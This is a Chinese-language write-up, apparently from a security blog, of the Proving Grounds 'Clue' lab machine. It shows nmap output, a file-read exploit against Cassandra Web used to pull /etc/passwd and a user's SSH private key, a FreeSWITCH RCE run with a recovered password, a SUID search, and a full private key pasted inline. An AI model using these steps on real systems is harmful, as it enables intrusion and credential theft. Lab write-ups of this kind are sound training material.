PG_Clue

admin 2025年3月21日00:52:59评论5 views字数 4812阅读16分2秒阅读模式

信息收集:

root@iZt4nbifrvtk7cy11744y4Z:~# nmap -p- -Pn -A -sS -T4 192.168.164.240Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-17 09:42 CSTNmap scan report for 192.168.164.240Host is up (0.0025s latency).Not shown: 65529 filtered portsPORT     STATE SERVICE          VERSION22/tcp   open  ssh              OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)| ssh-hostkey: |   2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)|   256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)|_  256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)80/tcp   open  http             Apache httpd 2.4.38|_http-server-header: Apache/2.4.38 (Debian)|_http-title: 403 Forbidden139/tcp  open  netbios-ssn      Samba smbd 3.X - 4.X (workgroup: WORKGROUP)445/tcp  open  netbios-ssn      Samba smbd 3.X - 4.X (workgroup: WORKGROUP)3000/tcp open  http             Thin httpd|_http-server-header: thin|_http-title: Cassandra Web8021/tcp open  freeswitch-event FreeSWITCH mod_event_socketWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Linux 2.6.32 (91%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.39 - 3.2 (86%), Infomir MAG-250 set-top box (86%)No exact OS matches for host (test conditions non-ideal).Network Distance: 4 hopsService Info: Hosts: 127.0.0.1, CLUE; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:|_ms-sql-info: ERROR: Script execution failed (use -d to debug)|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)| smb-security-mode: |   account_used: guest|   authentication_level: user|   challenge_response: supported|_  message_signing: disabled (dangerous, but default)| smb2-security-mode: |   2.02: |_    Message signing enabled but not required| smb2-time: |   date: 2025-02-17T01:43:56|_  start_date: N/ATRACEROUTE (using port 80/tcp)HOP RTT     ADDRESS1   2.00 ms 192.168.45.12   1.99 ms 192.168.45.2543   2.34 ms 192.168.251.14   2.42 ms 192.168.164.240OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 145.05 seconds

3000端口开了Cassandra Web,访问一下看看,稍等一会会显示出来如下界面,疑似数据库管理页面

PG_Clue

大概搜了下这个

Cassandra Web 结合了前沿的前端技术和可靠的后端服务,旨在简化Apache Cassandra数据库的管理和监控。它利用AngularJS构建响应式的用户界面,与基于Sinatra框架的HTTP API相结合,通过服务器发送事件(Server-Sent Events, SSE)实现实时交互,使得数据管理变得更加流畅和即时。

通过检索,先尝试了CVE-2021-44521能RCE的vul,失败,然后尝试了远程文件读取

PG_Clue

成功

python3 49362.py 192.168.164.240 -p 3000 /etc/passwd
PG_Clue

远程文件读取尝试读取了local,用户私钥,历史命令都无果后,看了hints(发现掉入兔子洞了

之前nmap扫描还有一个8021端口开放的freeswitch服务,检索漏洞并利用

PG_Clue
PG_Clue

直接连接会显示认证失败,应该是改了密码,刚刚不是找到了任意文件读取,问了一手GPT

PG_Clue

在第二个配置文件读取到了密码

PG_Clue

修改py文件的默认密码为:StrongClueConEight021

PG_Clue

成功RCE

PG_Clue

反弹shell,由于poc传入命令限制,不能过多使用'",使用base64

试了很多都不行,不知道是不是V*N的问题,直接读取local先交了

PG_Clue

我很疑惑为什么只有3000端口可以弹,可能又是V*N的问题,也可能有防火墙,80端口我服务器占用没办法用

PG_Clue

尝试suid提权

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null ;

有sodu权限

PG_Clue

有sudo权限,尝试更改用户密码

echo"freeswitch:12345" | chpasswd
PG_Clue

失败了,想起之前有看到一个ssh凭证

PG_Clue

利用远程文件读取查看一下

python3 49362.py 192.168.164.240 -p 3000 /home/cassie/id_rsa
PG_Clue

是一个私钥文件

echo"python3 49362.py 192.168.164.240 -p 3000 /home/cassie/id_rsa" | bash > id_rsa
PG_Clue

写入

cat <<EOF > ./id_rsa-----BEGIN OPENSSH PRIVATE KEY-----b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcnNhAAAAAwEAAQAAAQEAw59iC+ySJ9F/xWp8QVkvBva2nCFikZ0VT7hkhtAxujRRqKjhLKJed19FBjwkeSg+PevKIzrBVr0JQuEPJ1C9NCxRsp91xECMK3hGh/DBdfh1FrQACtS4oOdzdMjWyB00P1JPdEM4ojwzPu0CcduuV0kVJDndtsDqAcLJr+Ls8zYo376zCyJuCCBonPVitr2mB6KWILv/ajKwbgrNMZpQb8prHL3lRIVabjaSv0bITx1KMeyaya+K+Dz84Vu8uHNFJO0rhqgBAGtUgBJNJWa9EZtwws9PtsLIOzyZYrQTOTq4+q/FFpAKfbsNdqUe445FkvPmryyx7If/DaMoSYSPhwAAA8gc9JxpHPScaQAAAAdzc2gtcnNhAAABAQDDn2IL7JIn0X/FanxBWS8G9racIWKRnRVPuGSG0DG6NFGoqOEsol53X0UGPCR5KD4968ojOsFWvQlC4Q8nUL00LFGyn3XEQIwreEaH8MF1+HUWtAAK1Lig53N0yNbIHTQ/Uk90QziiPDM+7QJx265XSRUkOd22wOoBwsmv4uzzNijfvrMLIm4IIGic9WK2vaYHopYgu/9qMrBuCs0xmlBvymscveVEhVpuNpK/RshPHUox7JrJr4r4PPzhW7y4c0Uk7SuGqAEAa1SAEk0lZr0Rm3DCz0+2wsg7PJlitBM5Orj6r8UWkAp9uw12pR7jjkWS8+avLLHsh/8NoyhJhI+HAAAAAwEAAQAAAQBjswJsY1il9I7zFW9YetSN7wVok1dCMVXgOHD7iHYfmXSYyeFhNyuAGUz7fYF1Qj5enqJ5zAMnataigEOR3QNg6MmGiOCjceY+bWE8/UYMEuHR/VEcNAgY8X0VYxqcCM5NC201KuFdReM0SeT6FGVJVRTyTo+iCbX5ycWy36u109ncxnDrxJvvb7xROxQ/dCrusF2uVuejUtI4uX1eeqZy3Rb3GPVI4Ttq0+0hu6jNH4YCYU3SGdwTDz/UJIh9/10OJYsuKcDPBlYwT7mw2QmES3IACPpW8KZAigSLM4fGY2Ej3uwX8g6pku6P6ecgwmE2jYPP4c/TMU7TLuSAT9TpAAAAgG46HP7WIX+Hjdjuxa2/2CgX/VSpkzFcdARj51oG4bgXW33pkoXWHvt/iIz8ahHqZB4dniCjHVzjm2hiXwbUvvnKMrCGkrIAfZcUP7Ng/pb1wmqz14lNwuhj9WUhoVJFgYk14knZhC2v2dPdZ8BZ3dqBnfQl0IfR9byyQzy+CLBRAAAAgQD7g2V+1vlb8MEyIhQJsSxPGA8Ge05HJDKmaiwC2o+L3Er1dlktm/YskBW5hWiVwWoeCUAmUcNgFHMFs5nIZnWBwUhgukrdGu3xXpipp9uyeYuuE0/jGob5SFHXvUDEaXqE8Q9K14vb9by1RZaxWEMK6byndDNswtz9AeEwnCG0OwAAAIEAxxy/IMPfT3PUoknNQ2N8D2WlFEYh0avw/VlqUiGTJE8K6lbzu6M0nxv+OI0i1BVR1zrd28BYphDOsAy6kZNBTUiw4liAQFFhimnpld+7/8EBW1Oti8ZH5Mx8RdsxYtzBlC2uDyblKrG030Nk0EHNpcG6kRVj4oGMJpv1aeQnWSUAAAAMYW50aG9ueUBjbHVlAQIDBAUGBw==-----END OPENSSH PRIVATE KEY-----EOF

记得私钥的权限一定要是600

使用私钥连接用户cassie失败,尝试一手root

PG_Clue

拿到proof

PG_Clue

原文始发于微信公众号(EuSRC安全实验室):PG_Clue

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月21日00:52:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PG_Cluehttps://cn-sec.com/archives/3862802.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息